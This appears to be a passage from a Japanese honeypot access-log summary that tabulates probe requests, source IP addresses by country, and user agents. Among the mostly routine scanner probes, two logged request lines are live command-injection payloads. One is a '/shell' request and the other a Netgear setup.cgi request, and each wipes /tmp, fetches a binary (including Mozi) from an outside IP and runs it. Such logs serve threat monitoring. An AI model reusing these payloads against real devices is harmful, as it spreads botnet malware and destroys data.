2	CONNECT	`5[.]199[.]162[.]166:4444`	HTTP/1.1
1	CONNECT	`84[.]153[.]66[.]204:4444`	HTTP/1.1
1	CONNECT	`eth0[.]me:443`	HTTP/1.1
1	CONNECT	`v4[.]ident[.]me:443`	HTTP/1.1
1	CONNECT	`www[.]twitch[.]tv:443`	HTTP/1.1
51	GET	`/.env`	HTTP/1.1
2	GET	`/aaa9`	HTTP/1.1
2	GET	`/aab8`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
3	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
10	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/explore`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+94[.]158[.]247[.]123/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/vplayer/111057.html`	HTTP/1.1
1	GET	`http[:]//eth0[.]me?Z72612114222Q1`	HTTP/1.1
1	GET	`http[:]//v4[.]ident[.]me?Z72612114222Q1`	HTTP/1.1
1	HEAD	`http[:]//112[.]124[.]42[.]80:63435/`	HTTP/1.1
6	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/mgmt/tm/util/bash`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.72.13.71	United States
1	3.82.21.82	United States
1	3.120.38.14	United States
1	4.154.83.105	United States
1	5.188.210.227	Russia
1	13.36.172.99	United States
1	13.55.248.129	United States
1	13.233.93.204	United States
1	13.250.50.78	United States
1	15.237.118.113	United States
1	18.223.107.60	United States
1	35.161.84.44	United States
1	35.180.187.224	United States
1	35.183.207.41	United States
1	36.106.167.40	China
1	37.221.92.199	Germany
1	43.207.227.113	United States
1	45.56.108.128	United States
1	45.79.181.94	United States
1	45.79.181.104	United States
2	45.79.181.223	United States
2	45.88.66.237	Bulgaria
1	51.89.199.108	France
21	54.37.79.75	France
1	60.191.125.35	China
1	64.62.197.12	United States
1	64.62.197.15	United States
1	65.1.86.218	United States
1	66.175.213.4	United States
1	66.240.192.82	United States
7	68.183.227.10	United States
1	87.121.221.5	Bulgaria
1	87.251.64.11	Russia
1	92.118.39.82	Romania
2	109.237.98.226	Russia
1	152.89.196.211	Russia
2	162.142.125.215	United States
2	162.142.125.224	United States
1	162.243.143.26	United States
2	167.94.146.58	United States
2	167.248.133.37	United States
1	172.93.193.41	United States
3	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
1	172.105.128.13	United States
3	176.100.42.20	Russia
1	185.180.143.48	Portugal
11	193.32.162.159	Romania
2	193.35.18.251	Bulgaria
1	198.199.119.88	United States
1	198.235.24.196	United States
1	205.210.31.137	United States
1	212.120.182.210	Russia
1	220.198.240.185	China
1	221.235.75.141	China

UserAgent一覧

件数	UserAgent
31	`-`
1	`Hello World`
1	`Hello, World`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
25	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0`
6	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
4	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
14	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
3		`\x03`
1		`\x16\x03\x01\x01H\x01`
18		`\x16\x03\x01`
1	CONNECT	`5[.]199[.]162[.]166:4444`	HTTP/1.1
1	CONNECT	`84[.]153[.]66[.]204:4444`	HTTP/1.1
37	GET	`/.env`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/cgi-bin/downloadFlile.cgi`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
11	GET	`/dispatch.asp`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//221[.]235[.]75[.]141:33258/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/sugar_version.json`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/upl.php`	HTTP/1.1
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	HEAD	`http[:]//112[.]124[.]42[.]80:63435/`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
6	POST	`/boaform/admin/formLogin`	HTTP/1.1
4	PRI	`*`	HTTP/2.0